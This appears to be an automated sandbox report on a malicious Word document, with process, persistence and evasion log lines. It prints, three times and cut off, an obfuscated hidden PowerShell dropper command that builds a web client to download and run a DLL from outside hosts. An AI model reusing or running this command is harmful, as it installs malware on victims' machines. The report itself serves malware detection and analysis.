                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJJump to behavior
                Suspicious powershell command line foundShow sources
                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJ
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe POwersheLL -w hidden -ENCOD IAAkAEMAcgBBACAAPQAgAFsAVAB5AFAARQBdACgAIgB7ADMAfQB7ADEAfQB7ADAAfQB7ADIAfQAiACAALQBGACAAJwBlAG0ALgBJAE8ALgAnACwAJwBTAHQAJwAsACcAZABpAHIAZQBDAHQATwByAHkAJwAsACcAcwBZACcAKQAgADsAIABTAFYAIAAgACgAIgA1AGgAdgAiACsAIgAxAHoAIgApACAAIAAoAFsAVAB5AFAARQBdACgAIgB7ADEAfQB7ADIAfQB7ADQAfQB7ADMAfQB7ADAAfQAiAC0AZgAnAG4AQQBHAGUAUgAnACwAJwBzAFkAcwB0AEUAJwAsACcATQAuAE4AZQB0AC4AUwBlAFIAVgBpAGMAJwAsACcAQQAnACwAJwBlAHAATwBpAE4AVABtACcAKQAgACAAKQAgADsAIAAkAEEAdgBuAG4AMAB1AGYAPQAoACgAJwBUAHkANwBuACcAKwAnADAAJwApACsAJwBzAGMAJwApADsAJABIADIAcQA2AHEAcAB6AD0AJABVAG0AYwByAHUAZwAxACAAKwAgAFsAYwBoAGEAcgBdACgANgA0ACkAIAArACAAJABZAHYAawA2AGgAYwBwADsAJABOADYANgA3AGMAbABsAD0AKAAnAFAAJwArACgAJwA0AG0AJwArACcAcwAnACkAKwAoACcAdgAnACsAJwByAHMAJwApACkAOwAgACAAKAAgACAARwBlAFQALQBWAGEAUgBJAGEAQgBMAEUAIAAgACgAIgBDACIAKwAiAHIAYQAiACkAIAAgACkALgBWAGEATABVAEUAOgA6ACIAYwBSAGAAZQBgAEEAdABlAGQASQByAGAARQBjAHQAbwByAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAJwB7ADAAfQBGACcAKwAoACcAMgBuACcAKwAnAGUAZgBxACcAKQArACcANgB7ADAAfQBQACcAKwAoACcAcgBzACcAKwAnADIAbgBkACcAKQArACcAaAB7ADAAfQAnACkALQBGACAAWwBDAEgAYQBSAF0AOQAyACkAKQA7ACQASwAwADAAYQBhADIAYwA9ACgAJwBXAGgAJwArACgAJwBwACcAKwAnAG8AagAnACkAKwAnAGwAbwAnACkAOwAgACAAKAAgAGcAZQBUAC0AVgBBAHIAaQBBAEIAbABlACAAKAAiADUASABWACIAKwAiADEAegAiACkAIAApAC4AVgBhAEwAVQBFADoAOgAiAHMARQBjAFUAUgBJAHQAeQBwAFIAYABPAFQAbwBDAGAATwBMACIAIAA9ACAAKAAnAFQAJwArACgAJwBsACcAKwAnAHMAMQAyACcAKQApADsAJABGAHoANQBkAHkAZwBzAD0AKAAnAEIAJwArACgAJwBwACcAKwAnADgAMgA1AGkAJwArACcAdgAnACkAKQA7ACQAUQA0AGEAOABsADEANQAgAD0AIAAoACgAJwBDAGgAJwArACcAcABpAGUAJwArACcAbwAnACkAKwAnAGcAJwApADsAJABVAGEAYgA2ADgAOABvAD0AKAAnAEsAJwArACcAeQAnACsAKAAnAGoAOAB4ACcAKwAnAG8AcQAnACkAKQA7ACQATAByADAAdwA1AGwAYQA9ACgAJwBQACcAKwAoACcAOQAnACsAJwBsAGMANwBmACcAKQArACcAdQAnACkAOwAkAFoAcgB3AGoAaAA5AGsAPQAkAEgATwBNAEUAKwAoACgAJwB7ADAAJwArACcAfQBGADIAbgAnACsAJwBlAGYAJwArACcAcQA2AHsAMAB9AFAAcgBzADIAJwArACcAbgBkAGgAewAwAH0AJwApAC0AZgBbAEMASABhAFIAXQA5ADIAKQArACQAUQA0AGEAOABsADEANQArACgAJwAuAGQAJwArACcAbABsACcAKQA7ACQATgBiAG0AeABmAHgAdgA9ACgAKAAnAEEAdwAnACsAJwBuACcAKQArACgAJwBnACcAKwAnADAAegA2ACcAKQApADsAJABWADAAXwByAGkAMABuAD0ATgBlAHcAYAAtAG8AQgBgAGoARQBjAFQAIABuAGUAVAAuAHcAZQBiAEMATABJAGUATgB0ADsAJABOAGsAcQBfAGcAMABxAD0AKAAoACcAaAAnACsAKAAoACcAdAB0AHAAOgAnACsAJwBKACkAKAAzAHMAJwApACkAKwAoACgAJwAyACcAKwAnACkAKAAnACkAKQArACgAKAAnAEoAJwArACcAKQAoADMAcwAyACcAKwAnACkAKABhAHIAcQAnACkAKQArACcAdQBpACcAKwAoACcAdgAnACsAJwBvAHAAbwBwAC4AYwAnACkAKwAoACcAbwAnACsAJwBtACcAKwAnAC4AYgByAEoAJwApACsAKAAoACcAKQAnACsAJwAoADMAcwAnACkAKQArACgAKAAnADIAKQAnACkAKQArACgAKAAnACgAaQAnACkAKQArACcAbgAnACsAKAAnAGQAZQB4AF8AaAB0AG0AXwAnACsAJwBmACcAKwAnAGkAbAAnACsAJwBlAHMASgAnACkAKwAoACgAJwApACcAKwAnACgAMwAnACkAKQArACgAKAAnAHMAJwArACcAMgApACcAKQApACsAKAAoACcAKABLAHgAJwArACcAaABKACcAKQApACsAKAAoACcAKQAoACcAKwAnADMAJwApACkAKwAoACgAJwBzADIAKQAoAEAAaAB0ACcAKwAnAHQAJwArACcAcAAnACkAKQArACgAKAAnAHMAOgBKACcAKwAnACkAKAAzAHMAMgAnACkAKQArACgAKAAnACkAKABKACcAKwAnACkAJwApACkAKwAnACgAJJump to behavior
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10013BFB LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,6_2_10013BFB
                Source: Chpieog.dll.4.drStatic PE information: real checksum: 0x457fa should be: 0x416e4
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A3493C push edx; retf 4_2_00007FFA34A34A02
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A34B0B push eax; retf 4_2_00007FFA34A34B19
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A33EFB push es; retf 4_2_00007FFA34A33F0A
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 4_2_00007FFA34A342A3 push eax; retf 4_2_00007FFA34A342B1
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_1000B0BD push ecx; ret 6_2_1000B0D0
                Source: C:\Windows\SysWOW64\rundll32.exeCode function: 6_2_10007BCA push ecx; ret 6_2_10007BDD

                Persistence and Installation Behavior:

                barindex
                Creates processes via WMIShow sources
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\F2nefq6\Prs2ndh\Chpieog.dllJump to dropped file
                Source: C:\Windows\SysWOW64\rundll32.exePE file moved: C:\Windows\SysWOW64\Ezfa\bvb.lliJump to behavior

                Hooking and other Techniques for Hiding and Protection:

                barindex
                Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
                Source: C:\Windows\SysWOW64\rundll32.exeFile opened: C:\Windows\SysWOW64\Ezfa\bvb.lli:Zone.Identifier read attributes | deleteJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
